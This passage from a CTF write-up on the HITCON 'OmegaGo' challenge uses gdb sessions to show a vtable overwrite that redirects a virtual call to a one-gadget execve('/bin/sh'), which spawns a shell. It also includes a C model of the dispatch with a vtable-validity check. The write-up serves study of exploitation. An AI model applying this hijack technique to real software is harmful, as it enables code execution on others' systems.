...
- The modified vtable information can be confirmed as follows.
- The AI vtable area is 0x1a37290, and it holds the address of the gCmd global variable +4.
- The gCmd global variable +4 (0x609440) area holds the address of the one gadget.
- That address is loaded into rax and called, and a shell is obtained.
lazenca0x0@ubuntu:~$ gdb -q -p 59695
Attaching to process 59695
Reading symbols from /home/lazenca0x0/CTF/HITCON/OmegaGo/omega_go_6eef19dbb9f98b67af303f18978914d10d8f06ac...(no debugging symbols found)...done.
Reading symbols from /usr/lib/x86_64-linux-gnu/libstdc++.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/x86_64-linux-gnu/libgcc_s.so.1...(no debugging symbols found)...done.
Reading symbols from /lib/x86_64-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/libc-2.23.so...done.
done.
Reading symbols from /lib/x86_64-linux-gnu/libm.so.6...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/libm-2.23.so...done.
done.
Reading symbols from /lib64/ld-linux-x86-64.so.2...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/ld-2.23.so...done.
done.
gdb-peda$ b *0x4017D0
Breakpoint 1 at 0x4017d0
gdb-peda$ c
Continuing.

Breakpoint 1, 0x00000000004017d0 in ?? ()
gdb-peda$ x/13i $rip
=> 0x4017d0:    mov    rax,QWORD PTR [rbp+rax*8-0x30]
   0x4017d5:    mov    rax,QWORD PTR [rax]
   0x4017d8:    mov    rax,QWORD PTR [rax]
   0x4017db:    mov    edx,DWORD PTR [rbp-0x5c]
   0x4017de:    sub    edx,0x1
   0x4017e1:    movsxd rdx,edx
   0x4017e4:    mov    rdi,QWORD PTR [rbp+rdx*8-0x30]
   0x4017e9:    lea    rsi,[rbp-0x60]
   0x4017ed:    lea    rcx,[rbp-0x64]
   0x4017f1:    mov    edx,DWORD PTR [rbp-0x5c]
   0x4017f4:    mov    r8,rsi
   0x4017f7:    mov    esi,0x609fc0
   0x4017fc:    call   rax
gdb-peda$ i r rax
rax            0x0      0x0
gdb-peda$ i r rbp
rbp            0x7ffdb99059e0   0x7ffdb99059e0
gdb-peda$ p/x 0x7ffdb99059e0 - 0x30
$1 = 0x7ffdb99059b0
gdb-peda$ x/gx 0x7ffdb99059b0
0x7ffdb99059b0: 0x0000000001a37290
gdb-peda$ x/gx 0x0000000001a37290
0x1a37290:      0x0000000000609440
gdb-peda$ x/gx 0x0000000000609440
0x609440:       0x00007f10d2973117
gdb-peda$ x/5i 0x00007f10d2973117
   0x7f10d2973117 <exec_comm+2263>:     mov    rax,QWORD PTR [rip+0x2d2d9a]        # 0x7f10d2c45eb8
   0x7f10d297311e <exec_comm+2270>:     lea    rsi,[rsp+0x70]
   0x7f10d2973123 <exec_comm+2275>:     lea    rdi,[rip+0x9bbed]        # 0x7f10d2a0ed17
   0x7f10d297312a <exec_comm+2282>:     mov    rdx,QWORD PTR [rax]
   0x7f10d297312d <exec_comm+2285>:     call   0x7f10d294e770 <execve>
gdb-peda$ b *0x4017fc
Breakpoint 2 at 0x4017fc
gdb-peda$ c
Continuing.

Breakpoint 2, 0x00000000004017fc in ?? ()
gdb-peda$ i r rax
rax            0x7f10d2973117   0x7f10d2973117
gdb-peda$ c
Continuing.
process 59695 is executing new program: /bin/dash
The vtable can be overwritten as follows.
- Set gameInfo.board[4] to the value 0x609440.
- This is the address of the global variable command (0x60943C), which stores the user input, plus 0x4.
- Fill the area up to gameInfo.board[1] with heap addresses.
- The value stored in gameInfo.board[4] ends up stored at the 0x*****550 area.
- Any seven characters can be entered after the coordinate value.
- Ex) A19!@#$%^&
- If the address of the execve("/bin/sh") code is stored at 0x609440, a shell can be obtained.
- The following was confirmed through debugging.
- The heap address stored in gameInfo.board[1] is 0x16a5530.
- Relative to 0x16a5530, gameInfo.board[4] holds 0x609440.
- That is, the vtable has been overwritten with 0x609440.
- At 0x609440, the address of the execve("/bin/sh") code is stored.
autolycos@ubuntu:~$ sudo gdb -q -p 6027
Attaching to process 6027
...
(gdb) b *0x04017FC
Breakpoint 1 at 0x4017fc
(gdb) x/12gx 0x609FC0
0x609fc0: 0x00000000016a54a0 0xaaaaaaaaaaaaaaaa
0x609fd0: 0x40000002aaaaaaaa 0x0000000555555555
0x609fe0: 0x0000000000609440 0x0000010000000000
0x609ff0: 0x1800000000000000 0xaaaa8000000008a4
0x60a000: 0x55550000000aaaaa 0x5555555555555555
0x60a010: 0x0000055555555555 0x0000000000000000
(gdb) c
Continuing.
Breakpoint 1, 0x00000000004017fc in ?? ()
(gdb) x/12gx 0x609FC0
0x609fc0: 0x00000000016a54a0 0x00000000016a5530
0x609fd0: 0x4000000aaaaaaaaa 0x0000000555555555
0x609fe0: 0x0000000000609440 0x0000010000000000
0x609ff0: 0x1800000000000000 0xaaaa8000000008a4
0x60a000: 0x55550000000aaaaa 0x5555555555555555
0x60a010: 0x0000055555555555 0x0000000000000000
(gdb) x/18gx 0x00000000016a5530
0x16a5530: 0x00000000016a54a0 0xaaaaaaaaaaaaaaaa
0x16a5540: 0x4000000aaaaaaaaa 0x0000000555555555
0x16a5550: 0x0000000000609440 0x0000010000000000
0x16a5560: 0x1800000000000000 0xaaaa8000000008a4
0x16a5570: 0x55550000000aaaaa 0x5555555555555555
0x16a5580: 0x0000055555555555 0x0000000000000000
0x16a5590: 0x0000000500000004 0x5000010000000058
0x16a55a0: 0x40667feb65a9a800 0x4063bc970b49e01e
0x16a55b0: 0x0000000000000120 0x0000000000000091
(gdb) x/gx 0x16a5550
0x16a5550: 0x0000000000609440
(gdb) x/gx 0x0000000000609440
0x609440: 0x00007f5d9c93a6bd
(gdb) c
Continuing.
process 6027 is executing new program: /bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x4017fc
(gdb)
(gdb) b *0x4017D0
Breakpoint 1 at 0x4017d0
(gdb) b *0x04017FC
Breakpoint 2 at 0x4017fc
(gdb) c
Continuing.
Breakpoint 1, 0x00000000004017d0 in ?? ()
(gdb) x/3i $rip
=> 0x4017d0: mov rax,QWORD PTR [rbp+rax*8-0x30]
0x4017d5: mov rax,QWORD PTR [rax]
0x4017d8: mov rax,QWORD PTR [rax]
(gdb) ni
0x00000000004017d5 in ?? ()
(gdb) i r rax
rax 0x1919550 26318160
(gdb) ni
0x00000000004017d8 in ?? ()
(gdb) i r rax
rax 0x609440 6329408
(gdb) ni
0x00000000004017db in ?? ()
(gdb) i r rax
rax 0x7fa236c046bd 140334680000189
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004017fc in ?? ()
(gdb) x/i $rip
=> 0x4017fc: call rax
(gdb) i r rax
rax 0x7fa236c046bd 140334680000189
(gdb)
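To make the dispatch chain the two gdb sessions step through concrete, here is an added C model (not code from this write-up or from the OmegaGo binary) of a heap object whose first qword is its vtable pointer: resolve_target() mirrors the loads that feed `call rax`, and dispatch_checked() shows the forward-edge check that would have refused the forged vtable. Player, PlayerVtable, ai_vt, human_vt and the 0x4141... marker are assumed names and constructed values.

```c
#include <stdint.h>
#include <string.h>
/* Constructed model of the dispatch at 0x4017d0..0x4017fc in the write-up:
 *   rax = players[i]; rax = *rax (vtable); rax = *rax (slot 0); call rax
 * Player, PlayerVtable, ai_vt, human_vt are assumed names, not the binary's. */
typedef struct Player Player;
typedef int (*move_fn)(Player *);
typedef struct { move_fn move; } PlayerVtable;
struct Player {
    const PlayerVtable *vt;  /* first qword of the heap object */
    uint64_t board[6];       /* constructed stand-in for gameInfo.board */
};

static int ai_move(Player *p)    { (void)p; return 1; }
static int human_move(Player *p) { (void)p; return 2; }
static const PlayerVtable ai_vt    = { ai_move };
static const PlayerVtable human_vt = { human_move };

/* The two loads after fetching the object pointer, without the call:
 * returns the raw qword the binary would put in rax (what `i r rax` showed). */
uintptr_t resolve_target(const Player *p) {
    uintptr_t slot0;
    memcpy(&slot0, p->vt, sizeof slot0);  /* read vtable[0] as a raw qword */
    return slot0;
}

/* Unchecked dispatch, as the binary does it: whatever slot 0 holds is called. */
int dispatch_unchecked(Player *p) { return p->vt->move(p); }

/* Forward-edge check: only compiled-in vtables are legal dispatch targets
 * (what -fsanitize=cfi-vcall decides automatically; hand-written here). */
static int vtable_is_known(const PlayerVtable *vt) {
    return vt == &ai_vt || vt == &human_vt;
}
/* Move result on success, -1 when the vtable pointer is not a known one. */
int dispatch_checked(Player *p) {
    if (!vtable_is_known(p->vt)) return -1;  /* refuse; caller logs or aborts */
    return p->vt->move(p);
}

/* Constructed stand-in for the write-up's corruption: the object's first
 * qword now points at writable data whose slot 0 is attacker-chosen. */
static uintptr_t forged_slot[1] = { 0x4141414141414141ull };
int demo_intact(void) { Player p = { &ai_vt, {0} }; return dispatch_checked(&p); }
uintptr_t demo_forged_target(void) {
    Player p = { (const PlayerVtable *)forged_slot, {0} }; return resolve_target(&p);
}
int demo_forged_refused(void) {
    Player p = { (const PlayerVtable *)forged_slot, {0} }; return dispatch_checked(&p);
}
```

dispatch_unchecked() on the forged object is exactly the `call rax` into attacker-chosen memory seen above, so the demos only resolve that target rather than call it.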
Exploit Code
Ubuntu 16.04.3 LTS
...